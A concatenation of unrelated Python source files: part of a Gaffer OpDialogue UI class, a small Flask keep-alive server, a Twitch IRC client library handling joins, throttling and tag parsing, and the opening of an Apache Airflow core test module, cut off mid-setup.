executeInBackground = False,
defaultButton = DefaultButton.FromUserData,
executeImmediately = False,
**kw
) :
# sort out our op and op holder
if isinstance( opInstanceOrOpHolderInstance, IECore.Op ) :
opInstance = opInstanceOrOpHolderInstance
self.__node = Gaffer.ParameterisedHolderNode()
self.__node.setParameterised( opInstance )
# set the current plug values as userDefaults to provide
# a clean NodeUI based on the initial settings of the Op.
# we assume that if an OpHolder was passed directly then
# the metadata has already been setup as preferred.
self.__setUserDefaults( self.__node )
else :
self.__node = opInstanceOrOpHolderInstance
opInstance = self.__node.getParameterised()[0]
# initialise the dialogue
if title is None :
title = IECore.CamelCase.toSpaced( opInstance.typeName() )
GafferUI.Dialogue.__init__( self, title, sizeMode=sizeMode, **kw )
# decide what we'll do after execution.
if postExecuteBehaviour == self.PostExecuteBehaviour.FromUserData :
postExecuteBehaviour = self.PostExecuteBehaviour.DisplayResult
d = None
with IECore.IgnoredExceptions( KeyError ) :
d = opInstance.userData()["UI"]["postExecuteBehaviour"]
if d is not None :
for v in self.PostExecuteBehaviour.values() :
if str( v ).lower() == d.value.lower() :
postExecuteBehaviour = v
break
else :
# backwards compatibility with batata
with IECore.IgnoredExceptions( KeyError ) :
d = opInstance.userData()["UI"]["closeAfterExecution"]
if d is not None :
postExecuteBehaviour = self.PostExecuteBehaviour.Close if d.value else self.PostExecuteBehaviour.DisplayResult
self.__postExecuteBehaviour = postExecuteBehaviour
self.__executeInBackground = executeInBackground
self.__defaultButton = defaultButton
# make a frame to contain our main ui element. this will
# contain different elements depending on our state.
self.__frame = GafferUI.Frame()
self._setWidget( self.__frame )
# get the ui for the op - we'll use this when we want
# the user to edit parameters.
self.__parameterEditingUI = GafferUI.NodeUI.create( self.__node )
# build a ui element for progress feedback and suchlike.
# we'll use this when executing and displaying the result.
with GafferUI.ListContainer( GafferUI.ListContainer.Orientation.Vertical, spacing = 4 ) as self.__progressUI :
GafferUI.Spacer( IECore.V2i( 1 ), parenting = { "expand" : True } )
self.__progressIconFrame = GafferUI.Frame(
borderStyle = GafferUI.Frame.BorderStyle.None,
parenting = {
"horizontalAlignment" : GafferUI.HorizontalAlignment.Center
}
)
self.__progressLabel = GafferUI.Label(
parenting = {
"expand" : True,
"horizontalAlignment" : GafferUI.HorizontalAlignment.Center,
}
)
GafferUI.Spacer( IECore.V2i( 250, 1 ), parenting = { "expand" : True } )
with GafferUI.Collapsible( "Details", collapsed = True ) as self.__messageCollapsible :
self.__messageWidget = GafferUI.MessageWidget()
# connect to the collapsible state change so we can increase the window
# size when the details pane is first shown.
self.__messageCollapsibleStateChangedConnection = self.__messageCollapsible.stateChangedSignal().connect(
Gaffer.WeakMethod( self.__messageCollapsibleStateChanged )
)
# add buttons. our buttons mean different things depending on our current state,
# but they equate roughly to going forwards or going backwards.
self.__backButton = self._addButton( "Back" )
self.__forwardButton = self._addButton( "Forward" )
self.__preExecuteSignal = GafferUI.WidgetSignal()
self.__postExecuteSignal = Gaffer.Signal2()
self.__opExecutedSignal = Gaffer.Signal1()
self.__haveResizedToFitParameters = False
if executeImmediately :
self.__initiateExecution()
else :
self.__initiateParameterEditing()
## Returns the ParameterisedHolder used to store the Op.
# This may be used to edit parameter values.
def parameterisedHolder( self ) :
return self.__node
## Signal emitted before executing the Op.
# Slots should have the signature `bool slot( opDialogue )`,
# and may return True to cancel execution, or False to
# allow it to continue.
def preExecuteSignal( self ) :
return self.__preExecuteSignal
## Signal emitted after executing the Op.
# Slots should have the signature `slot( opDialogue, result )`.
def postExecuteSignal( self ) :
return self.__postExecuteSignal
## A signal called when the user has pressed the execute button
# and the Op has been successfully executed. This is passed the
# result of the execution.
## \deprecated Use postExecuteSignal() instead.
def opExecutedSignal( self ) :
return self.__opExecutedSignal
## Returns the internal MessageWidget used for displaying messages
# output by the Op.
def messageWidget( self ) :
return self.__messageWidget
## Causes the dialogue to enter a modal state, returning the result
# of executing the Op, or None if the user cancelled the operation. Any
# validation or execution errors will be reported to the user and return
# to the dialogue for them to cancel or try again.
def waitForResult( self, **kw ) :
self.__resultOfWait = None
self.setModal( True, **kw ) # will return when the dialogue is closed
return self.__resultOfWait
def _acceptsClose( self ) :
# we mustn't allow the window to be closed while
# the op is running in the background.
return self.__state != self.__State.Execution
__State = IECore.Enum.create( "ParameterEditing", "Execution", "ErrorDisplay", "ResultDisplay" )
def __initiateParameterEditing( self, *unused ) :
self.__backButton.setText( "Cancel" )
self.__backButton.setEnabled( True )
self.__backButton.setVisible( True )
self.__backButtonClickedConnection = self.__backButton.clickedSignal().connect( 0, Gaffer.WeakMethod( self.__close ) )
executeLabel = "OK"
with IECore.IgnoredExceptions( KeyError ) :
executeLabel = self.__node.getParameterised()[0].userData()["UI"]["buttonLabel"].value
self.__forwardButton.setText( executeLabel )
self.__forwardButton.setEnabled( True )
self.__forwardButton.setVisible( True )
self.__forwardButtonClickedConnection = self.__forwardButton.clickedSignal().connect( 0, Gaffer.WeakMethod( self.__initiateExecution ) )
self.__frame.setChild( self.__parameterEditingUI )
self.__focusDefaultButton()
self.__state = self.__State.ParameterEditing
# when we first display our parameters, we want to ensure that the window
# is big enough to fit them nicely. we don't do this the next time we show
# the parameters, because the user may have deliberately resized the window.
if not self.__haveResizedToFitParameters :
self.resizeToFitChild( shrink = False )
self.__haveResizedToFitParameters = True
def __close( self, *unused ) :
self.__state = self.__State.ParameterEditing
self.close()
def __initiateExecution( self, *unused ) :
if self.preExecuteSignal()( self ) :
return
self.__progressIconFrame.setChild( GafferUI.BusyWidget() )
self.__progressLabel.setText( "<h3>Processing...</h3>" )
self.__backButton.setEnabled( False )
self.__backButton.setText( "Cancel" )
self.__forwardButton.setVisible( False )
self.__messageWidget.clear()
self.__messageCollapsible.setCollapsed( True )
self.__state = self.__State.Execution
if self.__executeInBackground :
self.__frame.setChild( self.__progressUI )
threading.Thread( target = self.__execute ).start()
else :
# we don't display progress when we're not threaded,
# because we have no way of updating it.
self.__execute()
def __execute( self ) :
try :
self.__node.setParameterisedValues()
with self.__messageWidget.messageHandler() :
result = self.__node.getParameterised()[0]()
except Exception, e :
result = sys.exc_info()
if self.__executeInBackground :
GafferUI.EventLoop.executeOnUIThread( IECore.curry( self.__finishExecution, result ) )
else :
# We're being called on the main gui thread, most likely from a button click on
# the forward button. If we called __finishExecution() immediately, it would add
# new slots to the button click signal, and these would be executed immediately
# for the _current_ click - this is not what we want! So we defer __finishExecution
# to the next idle event, when the current click is a thing of the past.
## \todo The documentation for boost::signals2 seems to imply that it has a different
# behaviour, and that slots added during signal emission are ignored until the next
# emission. If we move to using signals2, we may be able to revert this change.
GafferUI.EventLoop.addIdleCallback( IECore.curry( self.__finishExecution, result ) )
def __finishExecution( self, result ) :
if isinstance( result, IECore.Object ) :
if self.getModal() :
self.__resultOfWait = result
self.__initiateResultDisplay( result )
self.opExecutedSignal()( result )
self.postExecuteSignal()( self, result )
else :
self.__initiateErrorDisplay( result )
return False # remove idle callback
def __initiateErrorDisplay( self, exceptionInfo ) :
self.__progressIconFrame.setChild( GafferUI.Image( "failure.png" ) )
self.__progressLabel.setText( "<h3>Failed</h3>" )
self.__messageCollapsible.setCollapsed( False )
self.__backButton.setVisible( True )
self.__backButton.setText( "Cancel" )
self.__backButton.setEnabled( True )
self.__backButtonClickedConnection = self.__backButton.clickedSignal().connect( Gaffer.WeakMethod( self.__close ) )
self.__forwardButton.setVisible( True )
self.__forwardButton.setText( "Retry" )
self.__forwardButton.setEnabled( True )
self.__forwardButtonClickedConnection = self.__forwardButton.clickedSignal().connect( Gaffer.WeakMethod( self.__initiateParameterEditing ) )
self.__messageWidget.messageHandler().handle(
IECore.Msg.Level.Debug,
"Python Traceback",
"".join( traceback.format_exception( *exceptionInfo ) )
)
self.__messageWidget.messageHandler().handle(
IECore.Msg.Level.Error,
"Problem Executing {opName}".format( opName=self.__node.getParameterised()[0].typeName() ),
str( exceptionInfo[1] ),
)
self.__frame.setChild( self.__progressUI )
self.__forwardButton._qtWidget().setFocus()
self.__state = self.__State.ErrorDisplay
def __initiateResultDisplay( self, result ) :
# Although we computed a result successfully, there may still be minor problems
# indicated by messages the Op emitted - check for those.
problems = []
for level in ( IECore.Msg.Level.Error, IECore.Msg.Level.Warning ) :
count = self.__messageWidget.messageCount( level )
if count :
problems.append( "%d %s%s" % ( count, IECore.Msg.levelAsString( level ).capitalize(), "s" if count > 1 else "" ) )
if not problems :
# If there were no problems, then our post execute behaviour may
# indicate that we don't need to display anything - deal with
# those cases.
if self.__postExecuteBehaviour == self.PostExecuteBehaviour.Close :
self.__close()
return
elif self.__postExecuteBehaviour == self.PostExecuteBehaviour.None :
self.__initiateParameterEditing()
return
# Either the post execute behaviour says we should display the result, or we're
# going to anyway, because we don't want the problems to go unnoticed.
self.__progressIconFrame.setChild(
GafferUI.Image( "successWarning.png" if problems else "success.png" )
)
completionMessage = "Completed"
if problems :
completionMessage += " with " + " and ".join( problems )
self.__messageCollapsible.setCollapsed( False )
self.__progressLabel.setText( "<h3>" + completionMessage + "</h3>" )
self.__messageWidget.messageHandler().handle( IECore.Msg.Level.Info, "Result", str( result ) )
self.__backButton.setText( "Close" )
self.__backButton.setEnabled( True )
self.__backButton.setVisible( True )
self.__backButtonClickedConnection = self.__backButton.clickedSignal().connect( Gaffer.WeakMethod( self.__close ) )
self.__forwardButton.setText( "Again!" )
self.__forwardButton.setEnabled( True )
self.__forwardButton.setVisible( True )
self.__forwardButtonClickedConnection = self.__forwardButton.clickedSignal().connect( Gaffer.WeakMethod( self.__initiateParameterEditing ) )
if self.__postExecuteBehaviour in ( self.PostExecuteBehaviour.DisplayResultAndClose, self.PostExecuteBehaviour.Close ) :
self.__forwardButton.setVisible( False )
self.__frame.setChild( self.__progressUI )
self.__backButton._qtWidget().setFocus()
self.__state = self.__State.ResultDisplay
def __focusDefaultButton( self ) :
defaultButton = self.__defaultButton
if defaultButton == self.DefaultButton.FromUserData :
defaultButton = self.DefaultButton.OK
d = None
with IECore.IgnoredExceptions( KeyError ) :
d = self.__node.getParameterised()[0].userData()["UI"]["defaultButton"]
if d is not None :
for v in self.DefaultButton.values() :
if str( v ).lower() == d.value.lower() :
defaultButton = v
break
if defaultButton == self.DefaultButton.None :
self._qtWidget().setFocus()
elif defaultButton == self.DefaultButton.Cancel :
self.__backButton._qtWidget().setFocus()
else :
self.__forwardButton._qtWidget().setFocus()
def __messageCollapsibleStateChanged( self, collapsible ) :
if not collapsible.getCollapsed() :
# make the window bigger to better fit the messages, but don't make
# it any smaller than it currently is.
self.resizeToFitChild( shrink = False )
# remove our connection - we only want to resize the first time we
# show the messages. after this we assume that if the window is smaller
# it is because the user has made it so, and wishes it to remain so.
self.__messageCollapsibleStateChangedConnection = None
def __setUserDefaults( self, graphComponent ) :
if isinstance( graphComponent, Gaffer.Plug ) and hasattr( graphComponent, "getValue" ) :
with IECore.IgnoredExceptions( Exception ) :
Gaffer.Metadata.registerPlugValue( graphComponent, "userDefault", graphComponent.getValue() )
for child in graphComponent.children() :
self.__setUserDefaults( child )
|
keep_alive.py
|
from flask import Flask
from threading import Thread
app = Flask('')
@app.route('/')
def home():
return "Hello. I am alive!"
def run():
app.run(host='0.0.0.0',port=8080)
def keep_alive():
t = Thread(target=run)
t.start()
|
irc.py
|
import datetime
import re
import select
import socket
import threading
import time
from pytwitchirc.event import Event, CurrentEvent
class IRC:
def __init__(self, nickname: str, oauth: str, host='irc.chat.twitch.tv', port=6667,
log_settings=(0, 0, 0, 0), throttle=20, log_file=None, how_many=5, max_try=5):
"""
:param nickname: lowercase twitch username of the bot
:param oauth: chat authentication key. Can be found on twitchapps.com/tmi
:param host: twitch server to connect with
:param port: twitch server port to connect with
:param log_settings: [notice, warning, received, send] set the logging fashion
:param throttle: maximum number of message per 30s
:param log_file: path to the desired log file
:param how_many: maximum new connection per run loop
:param max_try: maximum try before abort joining a channel
"""
self.__nickname = nickname.lower()
self.__oauth = oauth
self.__host = host
self.__port = port
self.__log_settings = log_settings
self.__throttle = throttle
self.__log_file = log_file
self.__how_many = how_many
self.__max_try = max_try
self.__socket = None
self.__buffer = b''
self.__last_ping = time.time()
self.__event = CurrentEvent()
self.__event_sent_date = []
self.__event_buffer = []
self.__received_event = []
self.__status = -1
self.channels = {}
self.__channels_to_part = []
self.__channels_to_join = []
self.__to_join = []
self.__to_part = []
self.__to_send = []
self.__capabilities_acknowledged = {
"twitch.tv/tags": False,
"twitch.tv/commands": False,
"twitch.tv/membership": False
}
# Map of events with callback method
self.__callbacks = [
{
'type': 'PING',
'method': self.__send_pong,
'args': []
},
{
'type': 'PONG',
'method': self.__on_pong_handler,
'args': []
},
{
'type': 'CAP',
'method': self.__on_cap_handler,
'args': [self.__event]
},
{
'type': '376',
'method': self.__set_status,
'args': [2]
},
{
'type': 'JOIN',
'method': self.__on_join_handler,
'args': [self.__event]
},
{
'type': 'PART',
'method': self.__on_part_handler,
'args': [self.__event]
},
{
'type': '353',
'method': self.__on_353_handler,
'args': [self.__event]
},
{
'type': 'RECONNECT',
'method': self.__init_connection,
'args': []
}
]
# Starting a parallel thread to keep the IRC client running
__thread = threading.Thread(target=self.__run, args=())
__thread.daemon = True
__thread.start()
time.sleep(1)
def __run(self):
while True:
try:
self.__init_connection()
while True:
# check connection status
if self.__is_timed_out():
self.__warning('Client didn\'t receive ping for too long')
raise socket.timeout
# # [test] keep the connection alive
# self.__send_ping()
# __parse all received messages
self.__process_socket()
except socket.gaierror:
self.__reset_connection("Gaierror raised. Trying to reconnect.")
except socket.timeout:
self.__reset_connection("Timeout Error raised. Trying to reconnect.")
except ConnectionResetError:
self.__reset_connection("ConnectionResetError raised. Trying to reconnect.")
except BrokenPipeError:
self.__reset_connection("BrokenPipeError raised. Trying to reconnect.")
except OSError as e:
self.__reset_connection("OSError raised : {} . Trying to reconnect.".format(e.strerror))
print(e.args)
def __process_socket(self):
self.__receive_data()
while len(self.__event_buffer) > 0:
tmp = self.__event_buffer.pop(0)
try:
event = self.__parse(tmp)
self.__event.update(event)
self.__check_callback()
if self.__status == 3:
self.__received_event.append(event)
except Exception as e:
print(tmp, file=open("errors.txt", "a"))
print(e)
print(e.args)
self.__warning("appended an error to error.txt")
self.__warning(tmp)
if self.__status == 3:
# connect scheduled channels
if len(self.__to_join) > 0:
# retrieve the first channel to join
item = self.__to_join.pop(0)
channel = item[0]
counter = item[1]
timestamp = item[2]
# if the last try is below 5s old or the socket is throttling
if time.time() - timestamp < 5 or not self.__socket_locked():
self.__to_join.append((channel, counter, timestamp))
# else if the counter is below max_try
elif counter < self.__max_try:
# send the join request
self.__request_join(channel)
# add back to the list
counter += 1
self.__to_join.append((channel, counter, time.time()))
# send scheduled messages
self.__send_message()
# connect scheduled channels
if len(self.__to_part) > 0:
# retrieve the first channel to part
item = self.__to_part.pop(0)
channel = item[0]
counter = item[1]
timestamp = item[2]
# if the last try is below 5s old or the socket is throttling
if time.time() - timestamp < 5 or not self.__socket_locked():
self.__to_part.append((channel, counter, timestamp))
# else if the counter is below max_try
elif counter < self.__max_try:
# send the part request
self.__request_part(channel)
# add back to the list
counter += 1
self.__to_part.append((channel, counter, time.time()))
else:
self.__warning('Failed to join channel {}'.format(channel))
def __init_connection(self):
self.__connect()
self.list_all_channels_to_reconnect()
def __reset_connection(self, warn=None):
# print the warning if needed
if warn:
self.__warning(warn)
# emptying the buffer
self.__buffer = b''
# emptying the channel list
channels = list(self.channels)
self.channels.clear()
for channel in channels:
self.join(channel)
print(len(self.channels))
# reset status variables
self.__last_ping = time.time()
self.__socket = None
for key in self.__capabilities_acknowledged:
self.__capabilities_acknowledged[key] = False
self.__set_status(-1)
def __connect(self):
# setup the connection
self.__open_socket()
self.__connect_socket()
self.__send_pass()
self.__send_nickname()
# request all the IRC capabilities
self.__request_capabilities("twitch.tv/commands")
self.__request_capabilities("twitch.tv/tags")
self.__request_capabilities("twitch.tv/membership")
def __check_callback(self):
for handlers in self.__callbacks:
if self.__event.type == handlers['type']:
handlers['method'](*handlers['args'])
def __set_status(self, status):
if status == -1 and self.__status != -1:
self.__warning('STATUS : -1 - No socket')
elif status == -1 and self.__status == 3:
self.__warning('STATUS : -1 - Socket died')
elif status == 0:
self.__notice('STATUS : 0 - Socket opened')
elif status == 1:
self.__notice('STATUS : 1 - Socket connected')
elif status == 2:
self.__notice('STATUS : 2 - Socket authenticated')
elif status == 3:
self.__notice('STATUS : 3 - Socket ready, buffering messages')
self.__status = status
# get all received event and clear event buffer
def get_event(self) -> list:
events = self.__received_event
self.__received_event = []
return events
"""
Handlers
"""
# notify cap ack
def __on_cap_handler(self, event) -> None:
try:
# store the cap state
self.__capabilities_acknowledged[event.content] = True
# notify the cap ack
self.__notice('Capability {} got acknowledged'.format(event.content))
# if all cap are ack, set the status to 3 (ready)
if self.__capabilities_acknowledged['twitch.tv/membership'] and \
self.__capabilities_acknowledged['twitch.tv/tags'] and \
self.__capabilities_acknowledged['twitch.tv/commands']:
self.__set_status(3)
except KeyError:
self.__warning('Unsupported Cap Ack received : {}'.format(event.content))
# fetch chatter names
def __on_353_handler(self, event) -> None:
for chatter in event.content.split(' '):
self.channels[event.channel].append(chatter)
# notify a successful connection or a chatter joining
def __on_join_handler(self, event) -> None:
# if the author is the client
if event.author == self.__nickname:
self.__notice('Successfully connected to {}'.format(event.channel))
self.channels[event.channel] = []
for i in range(0, len(self.__to_join)):
if self.__to_join[i][0] == event.channel:
self.__to_join.pop(i)
break
# if the author is a chatter
else:
self.channels[event.channel].append(event.author)
# notify a channel disconnection or a chatter leaving
def __on_part_handler(self, event) -> None:
# if trigger by the client
if event.author == self.__nickname:
try:
self.channels.pop(event.channel)
self.__notice('Successfully disconnected from {}'.format(event.channel))
except KeyError:
self.__notice('Channel {author} disconnected, '
'but wasn\'t connected'.format(**event.__dict__))
# if trigger by other chatter
else:
try:
self.channels[event.channel].remove(event.author)
except ValueError:
self.__notice('User {author} disconnected from {channel}, '
'but wasn\'t connected'.format(**event.__dict__))
# notify a pong reception
def __on_pong_handler(self) -> None:
self.__notice('Pong received, connection is still alive')
"""
socket
"""
def __open_socket(self) -> None:
self.__socket = socket.socket()
self.__set_status(0)
def __connect_socket(self) -> bool:
try:
self.__socket.connect((self.__host, self.__port))
self.__socket.setblocking(0)
self.__notice('Connected to {0[0]}:{0[1]}'.format(self.__socket.getpeername()))
self.__set_status(1)
return True
except socket.gaierror:
self.__warning('Unable to connect.')
return False
# fetch data from the socket
def __receive_data(self):
# try to retrieve data from socket, timeout if nothing for .1 second
ready = select.select([self.__socket], [], [], 0.1)
if not ready[0]:
return
# get up to 1024 from the buffer and the socket then split the events
self.__buffer += self.__socket.recv(4096)
events = self.__buffer.split(b'\r\n')
self.__buffer = events.pop()
# append all the events to the event buffer
for event in events:
decoded = event.decode("utf-8")
self.__packet_received(decoded)
self.__event_buffer.append(decoded)
"""
channels management
"""
# send a channel connection request
def __request_join(self, channel: str):
if self.__wait_for_status():
self.__send('JOIN #{}\r\n'.format(channel), ignore_throttle=1)
# send a channel disconnection request
def __request_part(self, channel: str):
if channel in self.channels and self.__wait_for_status():
self.__send('PART #{}\r\n'.format(channel), ignore_throttle=1)
# rejoin all known channels
def list_all_channels_to_reconnect(self):
channels_to_reconnect = []
for channel in self.__to_join:
channels_to_reconnect.append((channel[0], 0, time.time() - 5))
for channel in self.channels:
channels_to_reconnect.append((channel, 0, time.time() - 5))
self.__to_join = channels_to_reconnect
self.channels = {}
# request channel join
def join(self, channel: str):
channels = list(self.channels)
if channel not in channels:
self.__to_join.append((channel, 0, time.time()-5))
else:
self.__warning('Already connected to channel {}, connection aborted'.format(channel))
# request channel join
def part(self, channel: str):
channels = list(self.channels)
scheduled_channels_connection = [item[0] for item in self.__to_join]
if channel in channels or channel in scheduled_channels_connection:
self.__to_part.append((channel, 0, time.time()-5))
else:
self.__warning('Not connected to channel {}, unable to disconnect'.format(channel))
"""
sending methods
"""
# todo rename this method
# Lock __send if throttling
def __socket_locked(self):
"""
:rtype bool
:return: return false if throttling
"""
# while the eldest event in the history is older than 30s
while len(self.__event_sent_date) > 0 and (time.time() - self.__event_sent_date[0]) > 30:
# pop the eldest event
self.__event_sent_date.pop(0)
# if throttling return false
return not (len(self.__event_sent_date) > self.__throttle)
# send a packet and log it[, obfuscate after a certain index][, ignore the throttling cap]
def __send(self, packet, obfuscate_after=None, ignore_throttle=0):
# verify throttling status
if self.__socket_locked() or ignore_throttle:
# verify socket instance
if self.__wait_for_status(0):
self.__socket.send(packet.encode('UTF-8'))
self.__event_sent_date.append(time.time())
# creating '**..' string with the length required
if obfuscate_after:
packet_hidden = '*' * (len(packet) - obfuscate_after)
packet = packet[0:obfuscate_after] + packet_hidden
# print to log
self.__packet_sent(packet)
# send a ping acknowledge
def __send_pong(self) -> None:
# update last ping time
self.__last_ping = time.time()
# send new ping
self.__send('PONG :tmi.twitch.tv\r\n', ignore_throttle=1)
# log
if not self.__log_settings[2]:
self.__notice('Ping Received. Pong sent.')
# send a ping request
def __send_ping(self) -> None:
# check if the last message was more than 3 min old
if len(self.__event_sent_date) and time.time() - self.__event_sent_date[-1] > 180:
self.__send('PING :tmi.twitch.tv\r\n', ignore_throttle=1)
if not self.__log_settings[2]:
self.__warning('Ping sent.')
def __send_nickname(self):
self.__send('NICK {}\r\n'.format(self.__nickname), ignore_throttle=1)
def __send_pass(self):
self.__send('PASS {}\r\n'.format(self.__oauth), 11, ignore_throttle=1)
# send a message to a channel and prevent sending to disconnected channels
def __send_message(self) -> None:
# if there is message to send and socket ready and socket not throttling
if len(self.__to_send) > 0 and self.__wait_for_status() and self.__socket_locked():
# retrieve the first message to send
item = self.__to_send.pop(0)
channel = item[0]
message = item[1]
# if channel not connected, try to connect
if channel not in self.channels:
self.join(channel)
self.__warning('Try to send to not connected channel, connecting to the channel..')
# Listing all message for the same channel to preserve sending order
channel_messages = [item]
channel_indexes = []
for i in range(0, len(self.__to_send)):
if channel == self.__to_send[i][0]:
channel_messages.append(self.__to_send[i])
channel_indexes.append(i)
# removing indexes
channel_indexes.reverse()
for indexes in channel_indexes:
self.__to_send.pop(indexes)
# Adding all messages at the end of the list
self.__to_send = self.__to_send + channel_messages
else:
packet = "PRIVMSG #{} :{}\r\n".format(channel, message)
self.__send(packet)
# request the sending of a message
def send(self, channel: str, message: str):
self.__to_send.append((channel, message))
# send a IRC capability request
def __request_capabilities(self, arg: str):
self.__send('CAP REQ :{}\r\n'.format(arg), ignore_throttle=1)
# check IRC time out state
def __is_timed_out(self):
return time.time() - self.__last_ping > 300
def __wait_for_status(self, target=3, timeout=10) -> bool:
# if client not ready wait until ready
if self.__status < target:
while self.__status < target:
self.__warning('Client not ready, current status is {} expect {},'.format(self.__status, target) +
' wait {}s until abort'.format(timeout))
if self.__status == 2 and target == 3:
for capabilities in self.__capabilities_acknowledged:
if not self.__capabilities_acknowledged[capabilities]:
self.__request_capabilities(capabilities)
timeout -= 1
time.sleep(1)
if timeout < 0:
return False
return True
"""
parsing methods
"""
# wrapper for parsing methods
def __parse(self, event):
try:
event_type = self.__parse_type(event)
channel = self.__parse_channel(event, event_type)
author = self.__parse_author(event)
content = self.__parse_content(event, channel)
tags = self.__parse_tags(event, content)
return Event(event, type=event_type, tags=tags, channel=channel, author=author, content=content)
except Exception as e:
print(e.args)
print(event)
def __parse_tags(self, event, content):
# Checking if there is tags
if event[0] == '@':
# Isolating tags (between '@' and ' :')
tags = event[1:].split(' :')[0]
tags = self.__parse_tags_dict(tags, ';', '=')
# Parsing sub dict (separator : '/' and ',')
for key in tags:
# undocumented tag, not processed #twitch
# supposed to be the parts of the message caught by auto-mod and parsed as such
if key == 'flags':
flags = tags['flags']
flagged = []
if len(flags):
flags_list = flags.split(',')
for flag in flags_list:
index1 = int(flag.split('-')[0])
index2 = int(flag.split('-')[1].split(':')[0]) + 1
attributes = flag.split(':')[1]
flagged.append({'from': index1,
'to': index2,
'attributes': attributes,
'text': content[index1:index2]})
tags[key] = flagged
elif key == 'msg-param-sub-plan-name':
tags[key] = tags[key].replace('\\s', ' ')
# if the tag contain ':' it's a dict containing lists
elif ':' in tags[key] and '://' not in tags[key]:
tags[key] = self.__parse_tags_dict(tags[key], '/', ':')
for sub_key in tags[key]:
tags[key][sub_key] = self.__parse_list(tags[key][sub_key], ',')
for i in range(0, len(tags[key][sub_key])):
tags[key][sub_key][i] = self.__parse_list(tags[key][sub_key][i], '-')
# if the tag contain '/' it's a dict containing ints
elif '/' in tags[key] and '//' not in tags[key]:
tags[key] = self.__parse_tags_dict(tags[key], ',', '/')
return tags
@staticmethod
def __parse_tags_dict(tag_dict_string: str, separator_a: str, separator_b: str) -> dict:
# Separating tags (separator : ";" )
tag_list = tag_dict_string.split(separator_a)
tag_dict = {}
# Appending key/value pair in a dict
for tag in tag_list:
key, value = tag.split(separator_b, 1)
# potentials escaped spaces
value = value.replace('\\s', ' ')
tag_dict[key] = value
return tag_dict
@staticmethod
def __parse_list(list_string, separator):
return list_string.split(separator)
@staticmethod
def __parse_type(event):
split = event.split()
for word in split:
if word.upper() == word:
return word
def __parse_channel(self, event, event_type):
# Channel in a whisper is always the client nickname
if event_type == 'WHISPER':
return self.__nickname
else:
try:
# Channel is prefixed by ' #' and followed by a space
return event.split(' #')[1].split()[0]
except IndexError:
# Some events don't belong to any channels
return None
@staticmethod
def __parse_author(event):
# author is formatted like : ':author!author@author.'
try:
return event.split('!')[1].split('@')[0]
except IndexError:
return None
# unused dev purposes
@staticmethod
def __parse_author_regex(event):
# 2 hours to create search string:
try:
return re.search(r':(.*?)!(\1)@(\1)\.', event).group(1)
except IndexError:
return None
@staticmethod
def __parse_content(event, channel):
target = " :"
if channel:
target = channel + target
content = event.split(target, maxsplit=1)
return content[1] if len(content) > 1 else None
"""logging methods"""
def __notice(self, text: str) -> None:
if self.__log_settings[0]:
print('[{}]\33[32m'.format(datetime.datetime.now()) + text + '\33[0m')
self.__log_to_file(text, "NOTE")
def __warning(self, text: str) -> None:
if self.__log_settings[1]:
print('[{}]\33[31m'.format(datetime.datetime.now()) + text + '\33[0m')
self.__log_to_file(text, "WARN")
def __packet_received(self, text: str) -> None:
if self.__log_settings[2]:
print('[{}]\33[36m<'.format(datetime.datetime.now()) + text + '\33[0m')
self.__log_to_file(text, "RCEV")
def __packet_sent(self, text: str) -> None:
if self.__log_settings[3]:
print('[{}]\33[34m>'.format(datetime.datetime.now()) + text.strip("\n") + '\33[0m')
self.__log_to_file(text, "SENT")
def __log_to_file(self, text: str, log_type: str) -> None:
if self.__log_file:
print("[{}][{}]:{}".format(datetime.datetime.now(), log_type, text), file=open(self.__log_file, "a+"))
|
core.py
|
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import print_function
import json
import unittest
import bleach
import doctest
import mock
import multiprocessing
import os
import re
import signal
import sqlalchemy
import subprocess
import tempfile
import warnings
from datetime import timedelta
from dateutil.relativedelta import relativedelta
from email.mime.application import MIMEApplication
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from freezegun import freeze_time
from numpy.testing import assert_array_almost_equal
from six.moves.urllib.parse import urlencode
from time import sleep
from airflow import configuration
from airflow.executors import SequentialExecutor
from airflow.models import Variable
configuration.conf.load_test_config()
from airflow import jobs, models, DAG, utils, macros, settings, exceptions
from airflow.models import BaseOperator
from airflow.operators.bash_operator import BashOperator
from airflow.operators.check_operator import CheckOperator, ValueCheckOperator
from airflow.operators.dagrun_operator import TriggerDagRunOperator
from airflow.operators.python_operator import PythonOperator
from airflow.operators.dummy_operator import DummyOperator
from airflow.hooks.base_hook import BaseHook
from airflow.hooks.sqlite_hook import SqliteHook
from airflow.bin import cli
from airflow.www import app as application
from airflow.settings import Session
from airflow.utils import timezone
from airflow.utils.timezone import datetime
from airflow.utils.state import State
from airflow.utils.dates import infer_time_unit, round_time, scale_time_units
from lxml import html
from airflow.exceptions import AirflowException
from airflow.configuration import AirflowConfigException, run_command
from jinja2.sandbox import SecurityError
from jinja2 import UndefinedError
import six
NUM_EXAMPLE_DAGS = 20
DEV_NULL = '/dev/null'
TEST_DAG_FOLDER = os.path.join(
os.path.dirname(os.path.realpath(__file__)), 'dags')
DEFAULT_DATE = datetime(2015, 1, 1)
DEFAULT_DATE_ISO = DEFAULT_DATE.isoformat()
DEFAULT_DATE_DS = DEFAULT_DATE_ISO[:10]
TEST_DAG_ID = 'unit_tests'
try:
import cPickle as pickle
except ImportError:
# Python 3
import pickle
def reset(dag_id=TEST_DAG_ID):
session = Session()
tis = session.query(models.TaskInstance).filter_by(dag_id=dag_id)
tis.delete()
session.commit()
session.close()
reset()
class OperatorSubclass(BaseOperator):
"""
An operator to test template substitution
"""
template_fields = ['some_templated_field']
def __init__(self, some_templated_field, *args, **kwargs):
super(OperatorSubclass, self).__init__(*args, **kwargs)
self.some_templated_field = some_templated_field
def execute(*args, **kwargs):
pass
class CoreTest(unittest.TestCase):
default_scheduler_args = {"num_runs": 1}
def setUp(self):
configuration.conf.load_test_config()
self.dagbag = models.DagBag(
dag_folder=DEV_NULL, include_examples=True)
self.args = {'owner': 'airflow', 'start_date': DEFAULT_DATE}
self.dag = DAG(TEST_DAG_ID, default_args=self.args)
self.dag_bash = self.dagbag.dags['example_bash_operator']
